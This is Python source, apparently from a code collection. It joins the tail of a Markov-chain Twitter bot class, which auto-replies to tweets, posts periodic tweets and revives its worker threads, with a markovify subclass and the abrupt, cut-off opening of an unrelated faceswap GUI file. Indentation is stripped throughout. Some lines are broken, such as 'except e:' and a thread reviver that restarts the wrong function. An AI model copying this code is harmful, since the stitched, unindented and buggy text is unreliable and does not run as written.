def read_pickle_data(self, filename, overwrite=False):
"""Reads a database dict form a pickle file
Arguments
filepath - A string that indicates the path of the new
pickle file
Keyword Arguments
overwrite - Boolean that indicates whether the existing data
should be overwritten (True) or not (False). The
default value is False.
"""
# Check whether the file exists
if not self._check_file(filename, allowedext=[u'.pickle', u'.dat']):
self._error(u'read_pickle_data',
u"File does not exist: '%s'" % (filename))
# Load a database from a pickle file
with open(filename, u'rb') as f:
data = pickle.load(f)
# Store the data internally
if overwrite:
self.clear_data(database=None)
self.data = copy.deepcopy(data)
else:
for database in data.keys():
for key in data[database].keys():
# If the key is not in the existing dataset yet, add it,
# then copy the loaded data into the existing data
if key not in self.data[database].keys():
self.data[database][key] = copy.deepcopy(
data[database][key])
# If the key is already in the existing data, add the
# loaded data to the existing list
else:
self.data[database][key].extend(
copy.deepcopy(data[database][key]))
# Get rid of the loaded data
del data
def set_simple_responses(self, respdict, overwrite=False):
"""Adds
Arguments
respdict - A dict that has keys that exactly match
intended target strings for auto-replying.
Each key points to a list of possible
replies (strings) to the intended target
string. One reply will be chosen at random
if the twitter_autoreply_start is called
with database='simpleresponse'.
Alternatively, values in the respdict can
also be single strings, which will then
always be used to reply to the intended
target string.
Keyword Arguments
overwrite - Boolean that indicates whether the existing data
should be overwritten (True) or not (False). The
default value is False.
"""
# Check if the 'simpleresponse' database already exists, and
# create it if necessary.
if not u'simpleresponse' in self.data.keys():
self.data[u'simpleresponse'] = {}
# Overwrite the database if requested.
if overwrite:
self.data[u'simpleresponse'] = {}
# Go through the passed respdict, and add its content to the
# database.
for targetstring in respdict.keys():
# Skip non-text values.
if type(targetstring) not in [str]:
self._message(u'set_simple_responses',
u"Key '%s' in passed respdict is not a string or unicode type, and thus will not be included in the database." % (targetstring))
continue
# Check if the value for this targetstring is text.
if type(respdict[targetstring]) in [str]:
# Convert to a tuple, and add to the database.
self.data[u'simpleresponse'][targetstring] = \
(respdict[targetstring])
# Check if the value for this targetstring is a list or a
# tuple.
elif type(respdict[targetstring]) in [list, tuple]:
# Copy the values, convert them all to unicode.
responses = map(str, list(respdict[targetstring]))
# Add the responses to the database.
self.data[u'simpleresponse'][targetstring] = \
tuple(responses)
# For any other data type, report a warning.
else:
self._message(u'set_simple_responses',
u"Key '%s' in passed respdict points to invalid data. Values need to be of type str, unicode, list, or tuple." % (targetstring))
def twitter_autoreply_start(self, targetstring, database=u'default',
keywords=None, prefix=None, suffix=None, maxconvdepth=None,
mindelay=1.5):
"""Starts the internal Thread that replies to all tweets that match
the target string.
For an explanation of the target string, see the Twitter dev site:
https://dev.twitter.com/streaming/overview/request-parameters#track
Arguments
targetstring - String that the bot should look out for. For
more specific information, see Twitter's
developer website (URL mentioned above).
Keyword Arguments
database - A string that indicates the name of the
specific database that you want to use to
generate tweets, or a list of database names
from which one will be selected at random,
or u'default' to use the default database.
You can also use the string 'auto-language'
to make the bot automatically detect the
language of Tweets, and to reply using a
database with the same name (e.g. 'en' for
English, or 'de' for German). Note that this
option relies on Twitter's language-detection
algorithms. If a language cannot be
identified, the fall-back will be 'en', or
'default' when 'en' is not available. Another
option is to use database='random-database',
which will select one of the non-empty
databases that are available to this bot.
Yet another option is to use
database='simpleresponse', which will select
a response from the list of available
responses from the 'simpleresponse' database.
You can add to this database by using the
set_simple_response method. Default value is
'default'.
keywords - A list of words that the bot should recognise in
tweets that it finds through its targetstring.
The bot will attempt to use the keywords it finds
to start its reply with. If more than one
keyword occurs in a tweet, the position of each
word in the keywords list will determine its
priority. I.e. if both keywords[0] and
keywords[1] occur in a tweet, an attempt will be
made to reply with keywords[0] first. If that
does not exist in the database, the next keyword
that was found in a tweet will be used (provided
it occurs in the keywords list).
prefix - A string that will be added at the start of
each tweet (no ending space required), or a
list of potential prefixes from which one
will be chosen at random. Pass None if you
don't want a prefix. Default value is None.
suffix - A string that will be added at the end of
each tweet (no starting space required), or
a list of potential suffixes from which one
will be chosen at random. Pass None if you
don't want a suffix. Default value is None.
maxconvdepth - Integer that determines the maximal depth of the
conversations that this bot is allowed to reply
to. This is useful if you want your bot to reply
to specific the Twitter handles of specific
people. If you are going to do this, please keep
this value low to prevent the bot from becomming
spammy. You can also set this keyword to None,
which is appropriate if you ask the bot to reply
to a very specific hashtag or your own Twitter
handle (i.e. a situation in which the bot is
sollicited to respond). Default value is None.
mindelay - A float that indicates the minimal time
between tweets in minutes. Default is 1.5
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'twitter_autoreply_start',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Raise an Exception if the passed intended database is
# 'simpleresponse' and the targetstring is not in the keys of the
# 'simpleresponse' database.
if database == u'simpleresponse':
if targetstring not in self.data[u'simpleresponse'].keys():
self._error(u'twitter_autoreply_start',
u"Targetstring '%s' was not found in the 'simpleresponse' database. Use the set_simple_responses function to add simple responses." % (targetstring))
# Update the autoreply parameters
self._autoreply_database = database
self._targetstring = targetstring
self._keywords = keywords
self._tweetprefix = prefix
self._tweetsuffix = suffix
self._maxconvdepth = maxconvdepth
self._mindelay = mindelay
# Signal the _autoreply thread to continue
self._autoreplying = True
def twitter_autoreply_stop(self):
"""Stops the Thread that replies to all tweets that match the target
string.
For an explanation of the target string, see the Twitter dev site:
https://dev.twitter.com/streaming/overview/request-parameters#track
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'twitter_autoreply_stop',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Update the autoreply parameters
self._autoreply_database = None
self._targetstring = None
self._keywords = None
self._tweetprefix = None
self._tweetsuffix = None
# Signal the _autoreply thread to pause
self._autoreplying = False
def twitter_login(self, cons_key, cons_secret, access_token,
access_token_secret):
"""Logs in to Twitter, using the provided access keys. You can get
these for your own Twitter account at apps.twitter.com
Arguments
cons_key - String of your Consumer Key (API Key)
cons_secret - String of your Consumer Secret (API Secret)
access_token - String of your Access Token
access_token_secret
- String of your Access Token Secret
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(
u'twitter_login', u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Log in to a Twitter account
self._oauth = twitter.OAuth(access_token, access_token_secret,
cons_key, cons_secret)
self._t = twitter.Twitter(auth=self._oauth)
self._ts = twitter.TwitterStream(auth=self._oauth)
self._loggedin = True
# Get the bot's own user credentials
self._credentials = self._t.account.verify_credentials()
def twitter_tweeting_start(self, database=u'default', days=1, hours=0,
minutes=0, jitter=0, keywords=None, prefix=None, suffix=None):
"""Periodically posts a new tweet with generated text. You can
specify the interval between tweets in days, hours, or minutes, or
by using a combination of all. (Not setting anything will result in
the default value of a 1 day interval.) You can also add optional
jitter, which makes your bot a bit less predictable.
Keyword arguments
database - A string that indicates the name of the
specific database that you want to use to
generate tweets, or a list of database names
from which one will be selected at random,
or u'default' to use the default database.
You can also use the string 'random-database'
to select one of the non-empty databases
that are available to this bot. Default
value is 'default'.
days - Numeric value (int or float) that indicates the
amount of days between each tweet.
hours - Numeric value (int or float) that indicates the
amount of hours between each tweet.
minutes - Numeric value (int or float) that indicates the
amount of minutes between each tweet.
jitter - Integer or float that indicates the jitter (in
minutes!) that is applied to your tweet. The
jitter is uniform, and on both ends of the delay
value. For example, a jitter of 30 minutes on a
tweet interval of 12 hours, will result inactual
intervals between 11.5 and 12.5 hours.
prefix - A string that will be added at the start of
each tweet (no ending space required), or a
list of potential prefixes from which one
will be chosen at random. Pass None if you
don't want a prefix. Default value is None.
suffix - A string that will be added at the end of
each tweet (no starting space required), or
a list of potential suffixes from which one
will be chosen at random. Pass None if you
don't want a suffix. Default value is None.
keywords - A list of words from which one is randomly
selected and used to attempt to start a tweet
with. If None is passed, the bot will free-style.
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'twitter_tweeting_start',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Clean up the values
if not(days > 0) or (days == None):
days = 0
if not(hours > 0) or (hours == None):
hours = 0
if not(minutes > 0) or (minutes == None):
minutes = 0
# Calculate the tweet interval in minutes
tweetinterval = (days * 24 * 60) + (hours * 60) + minutes
# If the tweetinterval wasn't set, default to 1 day
# (Thats 24 hours * 60 minutes per hour = 1440 minutes)
if tweetinterval == 0:
tweetinterval = 1440
# Update the autotweeting parameters
self._tweetingdatabase = database
self._tweetinginterval = tweetinterval
self._tweetingjitter = jitter
self._tweetingkeywords = keywords
self._tweetingprefix = prefix
self._tweetingsuffix = suffix
# Signal the _autotweet thread to continue
self._autotweeting = True
def twitter_tweeting_stop(self):
"""Stops the periodical posting of tweets with generated text.
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'twitter_tweeting_stop',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Update the autotweeting parameters
self._tweetingdatabase = None
self._tweetinginterval = None
self._tweetingjitter = None
self._tweetingkeywords = None
self._tweetingprefix = None
self._tweetingsuffix = None
# Signal the _autotweet thread to pause
self._autotweeting = False
def _autoreply(self):
"""Continuously monitors Twitter Stream and replies when a tweet
appears that matches self._targetstring. It will include
self._tweetprefix and self._tweetsuffix in the tweets, provided they
are not None.
"""
# Run indefinitively
while self._autoreplythreadlives:
# Wait a bit before rechecking whether autoreplying should be
# started. It's highly unlikely the bot will miss something if
# it is a second late, and checking continuously is a waste of
# resource.
time.sleep(1)
# Check whether the Threads are still alive, and revive if
# they aren't. (NOTE: This will not actually work if the
# auto-replying Thread is dead, because that is what's
# running this function. It will, however, revive the other
# Threads if they are dead. The other Threads also have _cpr
# calls, which serve to revive this Thread. Brilliant, no?)
self._cpr()
# Only start when the bot logs in to twitter, and when a
# target string is available
if self._loggedin and self._targetstring != None:
# Acquire the TwitterStream lock
self._tslock.acquire(True)
# Create a new iterator from the TwitterStream
iterator = self._ts.statuses.filter(track=self._targetstring)
# Release the TwitterStream lock
self._tslock.release()
# Only check for tweets when autoreplying
while self._autoreplying:
# Get a new Tweet (this will block until a new
# tweet becomes available, but can also raise a
# StopIteration Exception every now and again.)
try:
# Attempt to get the next tweet.
tweet = iterator.__next__()
except StopIteration:
# Restart the iterator, and skip the rest of
# the loop.
iterator = self._ts.statuses.filter(
track=self._targetstring)
continue
# Restart the connection if this is a 'hangup'
# notification, which will be {'hangup':True}
if u'hangup' in tweet.keys():
# Reanimate the Twitter connection.
self._twitter_reconnect()
# Skip further processing.
continue
# Store a copy of the latest incoming tweet, for
# debugging purposes
self._lasttweetin = copy.deepcopy(tweet)
# Only proceed if autoreplying is still required (there
# can be a delay before the iterator produces a new, and
# by that time autoreplying might already be stopped)
if not self._autoreplying:
# Skip one cycle, which will likely also make the
# the while self._autoreplying loop stop
continue
# Report to console
self._message(u'_autoreply', u"I've found a new tweet!")
try:
self._message(u'_autoreply', u'%s (@%s): %s' %
(tweet[u'user'][u'name'],
tweet[u'user'][u'screen_name'], tweet[u'text']))
except:
self._message(u'_autoreply',
u'Failed to report on new Tweet :(')
# Don't reply to this bot's own tweets
if tweet[u'user'][u'id_str'] == self._credentials[u'id_str']:
# Skip one cycle, which will bring us to the
# next tweet
self._message(u'_autoreply',
u"This tweet was my own, so I won't reply!")
continue
# Don't reply to retweets
if u'retweeted_status' in tweet.keys():
# Skip one cycle, which will bring us to the
# next tweet
self._message(u'_autoreply',
u"This was a retweet, so I won't reply!")
continue
# Don't reply to tweets that are in the nono-list
if tweet[u'id_str'] in self._nonotweets:
# Skip one cycle, which will bring us to the
# next tweet
self._message(u'_autoreply',
u"This tweet was in the nono-list, so I won't reply!")
continue
# Skip tweets that are too deep into a conversation
if self._maxconvdepth != None:
# Get the ID of the tweet that the current tweet
# was a reply to
orid = tweet[u'in_reply_to_status_id_str']
# Keep digging through the tweets until the the
# top-level tweet is found, or until we pass the
# maximum conversation depth
counter = 0
while orid != None and orid not in self._nonotweets:
# If the current in-reply-to-ID is not None,
# the current tweet was a reply. Increase
# the reply counter by one.
ortweet = self._t.statuses.show(id=orid)
orid = ortweet[u'in_reply_to_status_id_str']
counter += 1
# Stop counting when the current value
# exceeds the maximum allowed depth
if counter >= self._maxconvdepth:
# Add the current tweets ID to the list
# of tweets that this bot should not
# reply to. (Keeping track prevents
# excessive use of the Twitter API by
# continuously asking for the
# in-reply-to-ID of tweets)
self._nonotweets.append(orid)
# Don't reply if this tweet is a reply in a tweet
# conversation of more than self._maxconvdepth tweets,
# or if the tweet's ID is in this bot's list of
# tweets that it shouldn't reply to
if counter >= self._maxconvdepth or \
orid in self._nonotweets:
self._message(u'_autoreply',
u"This tweet is part of a conversation, and I don't reply to conversations with over %d tweets." % (self._maxconvdepth))
continue
# Detect the language of the tweet, if the
# language of the reply depends on it.
if self._autoreply_database == u'auto-language':
# Get the language of the tweet, or default
# to English if it isn't available.
if u'lang' in tweet.keys():
lang = tweet[u'lang'].lower()
self._message(
u'_autoreply', u"I detected language: '%s'." % (lang))
else:
lang = u'en'
self._message(
u'_autoreply', u"I couldn't detect the language, so I defaulted to '%s'." % (lang))
# Check if the language is available in the
# existing dicts. Select the associated
# database, or default to English when the
# detected language isn't available, or
# default to u'default' when English is not
# available.
if lang in self.data.keys():
database = lang
self._message(
u'_autoreply', u"I chose database: '%s'." % (database))
elif u'en' in self.data.keys():
database = u'en'
self._message(
u'_autoreply', u"There was no database for detected language '%s', so I defaulted to '%s'." % (lang, database))
else:
database = u'default'
self._message(
u'_autoreply', u"There was no database for detected language '%s', nor for 'en', so I defaulted to '%s'." % (lang, database))
# Randomly choose a database if a random database
# was requested. Never use an empty database,
# though (the while loop prevents this).
elif self._autoreply_database == u'random-database':
database = random.choice(self.data.keys())
while self.data[database] == {} or database == u'simplereply':
database = random.choice(self.data.keys())
self._message(u'_autoreply',
u'Randomly chose database: %s' % (database))
# Randomly choose a database out of a list of
# potential databases.
elif type(self._autoreply_database) in [list, tuple]:
database = random.choice(self._autoreply_database)
self._message(u'_autoreply',
u'Randomly chose database: %s' % (database))
# Use the preferred database.
elif type(self._autoreply_database) in [str]:
database = copy.deepcopy(self._autoreply_database)
self._message(u'_autoreply',
u'Using database: %s' % (database))
# If none of the above options apply, default to
# the default database.
else:
database = u'default'
self._message(u'_autoreply',
u'Defaulted to database: %s' % (database))
# If the selected database is not a string, or if
# it is empty, then fall back on the default
# database.
if type(database) not in [str]:
self._message(u'_autoreply',
u"Selected database '%s' is invalid, defaulting to: %s" % (database, u'default'))
database = u'default'
elif database not in self.data.keys():
self._message(u'_autoreply',
u"Selected database '%s' does not exist, defaulting to: %s" % (database, u'default'))
database = u'default'
elif self.data[database] == {}:
self._message(u'_autoreply',
u"Selected database '%s' is empty, defaulting to: %s" % (database, u'default'))
database = u'default'
# Separate the words in the tweet
tw = tweet[u'text'].split()
# Clean up the words in the tweet
for i in range(len(tw)):
# Remove clutter
tw[i] = tw[i].replace(u'@', u''). \
replace(u'#', u'').replace(u'.', u''). \
replace(u',', u'').replace(u';', u''). \
replace(u':', u'').replace(u'!', u''). \
replace(u'?', u'').replace(u"'", u'')
# Make a list of potential seed words in the tweet
seedword = []
if self._keywords != None:
for kw in self._keywords:
# Check if the keyword is in the list of
# words from the tweet
if kw in tw:
seedword.append(kw)
# If there are no potential seeds in the tweet, None
# will lead to a random word being chosen
if len(seedword) == 0:
seedword = None
# Report back on the chosen keyword
self._message(
u'_autoreply', u"I found seedwords: '%s'." % (seedword))
# Construct a prefix for this tweet, which should
# include the handle ('@example') of the sender
if self._tweetprefix == None:
prefix = u'@%s' % (tweet[u'user'][u'screen_name'])
else:
# Use the specified prefix.
if type(self._tweetprefix) in [str]:
prefix = u'@%s %s' % \
(tweet[u'user'][u'screen_name'],
self._tweetprefix)
# Randomly choose one of the specified
# prefixes.
elif type(self._tweetprefix) in [list, tuple]:
prefix = u'@%s %s' % \
(tweet[u'user'][u'screen_name'],
random.choice(self._tweetprefix))
# Fall back on the default option.
else:
prefix = u'@%s' % (tweet[u'user'][u'screen_name'])
self._message(u'_autoreply',
u"Could not recognise the type of prefix '%s'; using no prefix." % (self._tweetprefix))
# Construct a suffix for this tweet. We use the
# specified suffix, which can also be None. Or
# we randomly select one from a list of potential
# suffixes.
if self._tweetsuffix == None:
suffix = copy.deepcopy(self._tweetsuffix)
elif type(self._tweetsuffix) in [str]:
suffix = copy.deepcopy(self._tweetsuffix)
elif type(self._tweetsuffix) in [list, tuple]:
suffix = random.choice(self._tweetsuffix)
else:
suffix = None
self._message(u'_autoreply',
u"Could not recognise the type of suffix '%s'; using no suffix." % (self._tweetsuffix))
# If the database is set to 'simpleresponse',
# choose a tweet from the simpleresponse database.
if database == u'simpleresponse':
response = u'%s %s %s' \
% (prefix, random.choice(self.data[u'simpleresponse'][self._targetstring]), suffix)
if len(response) > 140:
response = response[:140]
# Construct a new tweet using the database.
else:
response = self._construct_tweet(
database=database, seedword=seedword,
prefix=prefix, suffix=suffix)
# Acquire the twitter lock
self._tlock.acquire(True)
# Reply to the incoming tweet
try:
# Post a new tweet
resp = self._t.statuses.update(status=response,
in_reply_to_status_id=tweet[u'id_str'],
in_reply_to_user_id=tweet[u'user'][u'id_str'],
in_reply_to_screen_name=tweet[u'user'][u'screen_name']
)
# Report to the console
self._message(
u'_autoreply', u'Posted reply: %s' % (response))
# Store a copy of the latest outgoing tweet, for
# debugging purposes
self._lasttweetout = copy.deepcopy(resp)
except e:
self._error(u'_autoreply',
u"Failed to post a reply: '%s'" % (e))
# Release the twitter lock
self._tlock.release()
# Wait for the minimal tweeting delay.
time.sleep(60.0 * self._mindelay)
def _autotweet(self):
"""Automatically tweets on a periodical basis.
"""
# Run indefinitively
while self._tweetingthreadlives:
# Wait a bit before rechecking whether tweeting should be
# started. It's highly unlikely the bot will miss something if
# it is a second late, and checking continuously is a waste of
# resources.
time.sleep(1)
# Check whether the Threads are still alive, and revive if
# they aren't. (NOTE: This will not actually work if the
# auto-tweeting Thread is dead, because that is what's
# running this function. It will, however, revive the other
# Threads if they are dead. The other Threads also have _cpr
# calls, which serve to revive this Thread. Brilliant, no?)
self._cpr()
# Only start when the bot logs in to twitter, and when tweeting
# is supposed to happen
while self._loggedin and self._autotweeting:
print('printing', self)
# Choose a random keyword
kw = None
if self._tweetingkeywords != None:
if type(self._tweetingkeywords) in \
[str]:
kw = self._tweetingkeywords
else:
kw = random.choice(self._tweetingkeywords)
# Choose the database to use. If the database should be
# random, then randomly choose a non-empty database.
if self._tweetingdatabase == u'random-database':
database = random.choice(self.data.keys())
while self.data[database] == {} or database == u'simpleresponse':
database = random.choice(self.data.keys())
self._message(u'_autotweet',
u'Randomly chose database: %s' % (database))
# If the database is a list of alternatives, randomly
# select one.
elif type(self._tweetingdatabase) in [list, tuple]:
database = random.choice(self._tweetingdatabase)
# If the specified database is a string, use it.
elif type(self._tweetingdatabase) in [str]:
database = copy.deepcopy(self._tweetingdatabase)
# Fall back on the default option.
else:
self._message(u'_autotweet',
u"Could not recognise the type of database '%s'; using '%s' instead." % (self._tweetingdatabase, u'default'))
database = u'default'
# Construct a prefix for this tweet. We use the
# specified prefix, which can also be None. Or
# we randomly select one from a list of potential
# prefixes.
if self._tweetingprefix == None:
prefix = copy.deepcopy(self._tweetingprefix)
elif type(self._tweetingprefix) in [str]:
prefix = copy.deepcopy(self._tweetingprefix)
elif type(self._tweetingprefix) in [list, tuple]:
prefix = random.choice(self._tweetingprefix)
else:
prefix = None
self._message(u'_autotweet',
u"Could not recognise the type of prefix '%s'; using no suffix." % (self._tweetingprefix))
# Construct a suffix for this tweet. We use the
# specified suffix, which can also be None. Or
# we randomly select one from a list of potential
# suffixes.
if self._tweetingsuffix == None:
suffix = copy.deepcopy(self._tweetingsuffix)
elif type(self._tweetingsuffix) in [str]:
suffix = copy.deepcopy(self._tweetingsuffix)
elif type(self._tweetingsuffix) in [list, tuple]:
suffix = random.choice(self._tweetingsuffix)
else:
suffix = None
self._message(u'_autotweet',
u"Could not recognise the type of suffix '%s'; using no suffix." % (self._tweetingsuffix))
# Construct a new tweet
newtweet = self._construct_tweet(database=database,
seedword=kw, prefix=prefix, suffix=suffix)
# Acquire the twitter lock
self._tlock.acquire(True)
# Reply to the incoming tweet
try:
# Post a new tweet
tweet = self._t.statuses.update(status=newtweet)
# Report to the console
self._message(u'_autotweet',
u'Posted tweet: %s' % (newtweet))
# Store a copy of the latest outgoing tweet, for
# debugging purposes
self._lasttweetout = copy.deepcopy(tweet)
except:
# Reconnect to Twitter.
self._twitter_reconnect()
# Try to post again.
try:
# Post a new tweet
tweet = self._t.statuses.update(status=newtweet)
# Report to the console
self._message(u'_autotweet',
u'Posted tweet: %s' % (newtweet))
# Store a copy of the latest outgoing tweet,
# for debugging purposes
self._lasttweetout = copy.deepcopy(tweet)
except Exception as e:
self._error(
u'_autotweet', u"Failed to post a tweet! Error: '%s'" % (e))
# Release the twitter lock
self._tlock.release()
# Determine the next tweeting interval in minutes
jitter = random.randint(-self._tweetingjitter,
self._tweetingjitter)
interval = self._tweetinginterval + jitter
# Sleep for the interval (in seconds, hence * 60)
self._message(u'_autotweet',
u'Next tweet in %d minutes.' % (interval))
time.sleep(interval * 60)
def _check_file(self, filename, allowedext=None):
"""Checks whether a file exists, and has a certain extension.
Arguments
filename - String that indicates the path to a .txt file
that should be read by the bot.
Keyword Arguments
allowedext - List of allowed extensions, or None to allow all
extensions. Default value is None.
Returns
ok - Boolean that indicates whether the file exists,
andhas an allowed extension (True), or does not
(False)
"""
# Check whether the file exists
ok = os.path.isfile(filename)
# Check whether the extension is allowed
if allowedext != None:
name, ext = os.path.splitext(filename)
if ext not in allowedext:
ok = False
return ok
def _cpr(self):
"""Checks on the Threads that are supposed to be running, and
revives them when they are dead.
"""
# Check on the auto-reply Thread.
if self._autoreplythreadlives:
# Check if the Thread is still alive.
if not self._autoreplythread.is_alive():
# Report on the reviving.
self._message(
u'_cpr', u'_autoreplythread died; trying to revive!')
# Restart the Thread.
self._autoreplythread = Thread(target=self._autoreply)
self._autoreplythread.daemon = True
self._autoreplythread.name = u'autoreplier'
self._autoreplythread.start()
# Report on success!
self._message(
u'_cpr', u'Succesfully restarted _autoreplythread!')
# Check on the tweeting Thread.
if self._tweetingthreadlives:
# Check if the Thread is still alive.
if not self._tweetingthread.is_alive():
# Report on the reviving.
self._message(
u'_cpr', u'_tweetingthread died; trying to revive!')
# Restart the Thread.
self._tweetingthread = Thread(target=self._autoreply)
self._tweetingthread.daemon = True
self._tweetingthread.name = u'autotweeter'
self._tweetingthread.start()
# Report on success!
self._message(
u'_cpr', u'Succesfully restarted _tweetingthread!')
# Check on the self-examination Thread.
if self._selfexaminationthreadlives:
# Check if the Thread is still alive.
if not self._selfexaminationthread.is_alive():
# Report on the reviving.
self._message(
u'_cpr', u'Ironically, _selfexaminationthread died; trying to revive!')
# Restart the Thread.
self._selfexaminationthread = Thread(self._self_examination)
self._selfexaminationthread.daemon = True
self._selfexaminationthread.name = u'selfexaminer'
self._selfexaminationthread.start()
# Report on success!
self._message(
u'_cpr', u'Succesfully restarted _selfexaminationthread!')
def _construct_tweet(self, database=u'default', seedword=None,
prefix=None, suffix=None):
"""Constructs a text for a tweet, based on the current Markov chain.
The text will be of a length of 140 characters or less, and will
contain a maximum of 20 words (excluding the prefix and suffix)
Keyword Arguments
seedword - A string that indicates what word should be in
the sentence. If None is passed, or if the word
is not in the database, a random word will be
chosen. This value can also be a list of words,
in which case the list will be processed
one-by-one until a word is found that is in the
database. Default value is None.
database - A string that indicates the name of the
specific database that you want to use to
generate the text, or u'default' to use the
default database. (default = 'default')
prefix - A string that will be added at the start of each
tweet (no ending space required). Pass None if
you don't want a prefix. Default value is None.
suffix - A string that will be added at the end of each
tweet (no starting space required). Pass None if
you don't want a suffix. Default value is None.
Returns
tweet - A string with a maximum length of 140 characters.
"""
sl = 140
response = u''
while response == u'' or len(response) > 140:
# Generate some random text
response = self.generate_text(sl, seedword=seedword,
database=database, verbose=False, maxtries=100)
# Add the prefix
if prefix != None:
response = u'%s %s' % (prefix, response)
# Add the suffix
if suffix != None:
response = u'%s %s' % (response, suffix)
# Reduce the amount of words if the response is too long
if len(response) > 140:
sl -= 1
return response
def _error(self, methodname, msg):
"""Raises an Exception on behalf of the method involved.
Arguments
methodname - String indicating the name of the method that is
throwing the error.
message - String with the error message.
"""
raise Exception(u"ERROR in Markovbot.%s: %s" % (methodname, msg))
def _isalphapunct(self, string):
"""Returns True if all characters in the passed string are
alphabetic or interpunction, and there is at least one character in
the string.
Allowed interpunction is . , ; : ' " ! ?
Arguments
string - String that needs to be checked.
Returns
ok - Boolean that indicates whether the string
contains only letters and allowed interpunction
(True) or not (False).
"""
if string.replace(u'.', u'').replace(u',', u'').replace(u';', u''). \
replace(u':', u'').replace(u'!', u'').replace(u'?', u''). \
replace(u"'", u'').isalpha():
return True
else:
return False
def _message(self, methodname, msg):
"""Prints a message on behalf of the method involved. Friendly
verion of self._error
Arguments
methodname - String indicating the name of the method that is
throwing the error.
message - String with the error message.
"""
print(u"MSG from Markovbot.%s: %s" % (methodname, msg))
def _self_examination(self):
"""This function runs in the self-examination Thread, and
continuously checks whether the other Threads are still alive.
"""
# Run until the Boolean is set to False.
while self._selfexaminationthreadlives:
# Sleep for a bit to avoid wasting resources.
time.sleep(5)
# Check if the Threads are alive, and revive if necessary.
self._cpr()
def _triples(self, words):
"""Generate triplets from the word list
This is inspired by Shabda Raaj's blog on Markov text generation:
http://agiliq.com/blog/2009/06/generating-pseudo-random-text-with-markov-chains-u/
Moves over the words, and returns three consecutive words at a time.
On each call, the function moves one word to the right. For example,
"What a lovely day" would result in (What, a, lovely) on the first
call, and in (a, lovely, day) on the next call.
Arguments
words - List of strings.
Yields
(w1, w2, w3) - Tuple of three consecutive words
"""
# We can only do this trick if there are more than three words left
if len(words) < 3:
return
for i in range(len(words) - 2):
yield (words[i], words[i + 1], words[i + 2])
def _twitter_reconnect(self):
"""Logs in to Twitter, using the stored OAuth. This function is
intended for internal use, and should ONLY be called after
twitter_login has been called.
"""
# Report the reconnection attempt.
self._message(u'_twitter_reconnect',
u"Attempting to reconnect to Twitter.")
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'_twitter_reconnect',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Log in to a Twitter account
self._t = twitter.Twitter(auth=self._oauth)
self._ts = twitter.TwitterStream(auth=self._oauth)
self._loggedin = True
# Get the bot's own user credentials
self._credentials = self._t.account.verify_credentials()
# Report the reconnection success.
self._message(u'_twitter_reconnect',
u"Successfully reconnected to Twitter!")
class PolitionSimulator(markovify.Text):
html_parser = HTMLParser()
def test_sentence_input(self, sentence):
return True
def _prepare_text(self, text):
text = html.escape(text, quote=False)
text = text.strip()
if not text.endswith((".", "?", "!")):
text += "."
return text
def sentence_split(self, text):
# split everything up by newlines, prepare them, and join back together
lines = text.splitlines()
text = " ".join([self._prepare_text(line)
for line in lines if line.strip()])
return markovify.split_into_sentences(text)
def word_split(self, sentence):
words = re.split(self.word_split_pattern, sentence)
words = ["::".join(tag) for tag in nltk.pos_tag(words)]
return words
def word_join(self, words):
sentence = " ".join(word.split("::")[0] for word in words)
return sentence
def make_short_sentence(self, max_chars, min_chars=0, beginning=None, **kwargs):
if beginning == None:
tries = kwargs.get('tries', 1000)
for _ in range(tries):
sentence = self.make_sentence(**kwargs)
if sentence and len(sentence) <= max_chars and len(sentence) >= min_chars:
return sentence
else:
tries = kwargs.get('tries', 1000)
split = self.word_split(beginning)
word_count = len(split)
if word_count == self.state_size:
init_state = tuple(split)
elif word_count > 0 and word_count < self.state_size:
init_state = tuple(
[BEGIN] * (self.state_size - word_count) + split)
else:
err_msg = "`make_sentence_with_start` for this model requires a string containing 1 to {0} words. Yours has {1}: {2}".format(
self.state_size, word_count, str(split))
raise ParamError(err_msg)
for _ in range(tries):
sentence = self.make_sentence(init_state, **kwargs)
if sentence and len(sentence) <= max_chars and len(sentence) >= min_chars:
return sentence
|
gui.py | #!/usr/bin python3
""" The optional GUI for faceswap """
import os
import re
import signal
import subprocess
from subprocess import PIPE, Popen, TimeoutExpired
import sys
from argparse import SUPPRESS
from math import ceil, floor
from threading import Thread
from time import time
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.animation as animation
from matplotlib import pyplot as plt
from matplotlib import style
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import numpy
from lib.cli import FullPaths, ComboFullPaths, DirFullPaths, FileFullPaths
from lib.Serializer import JSONSerializer
PATHSCRIPT = os.path.realpath(os.path.dirname(sys.argv[0]))
# An error will be thrown when importing tkinter for users without tkinter
# distribution packages or without an X-Console. Therefore if importing fails
# no attempt will be made to instantiate the gui.
try:
import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
from tkinter import TclError
except ImportError:
tk = None
ttk = None
filedialog = None
messagebox = None
TclError = None
class Utils(object):
""" Inter-class object holding items that are required across classes """
def __init__(self, options, calling_file="faceswap.py"):
self.opts = options
self.icons = dict()
self.guitext = dict()
self.actionbtns = dict()
self.console = None
self.debugconsole = False
self.serializer = JSONSerializer
self.filetypes = (('Faceswap files', '*.fsw'), ('All files', '*.*'))
self.task = FaceswapControl(self, calling_file=calling_file)
self.runningtask = False
self.previewloc = os.path.join(PATHSCRIPT, '.gui_preview.png')
self.lossdict = dict()
def init_tk(self):
""" TK System must be on prior to setting tk variables,
so initialised from GUI """
pathicons = os.path.join(PATHSCRIPT, 'icons')
self.icons['folder'] = tk.PhotoImage(
file=os.path.join(pathicons, 'open_folder.png'))
self.icons['load'] = tk.PhotoImage(
file=os.path.join(pathicons, 'open_file.png'))
self.icons['save'] = tk.PhotoImage(
file=os.path.join(pathicons, 'save.png'))
self.icons['reset'] = tk.PhotoImage(
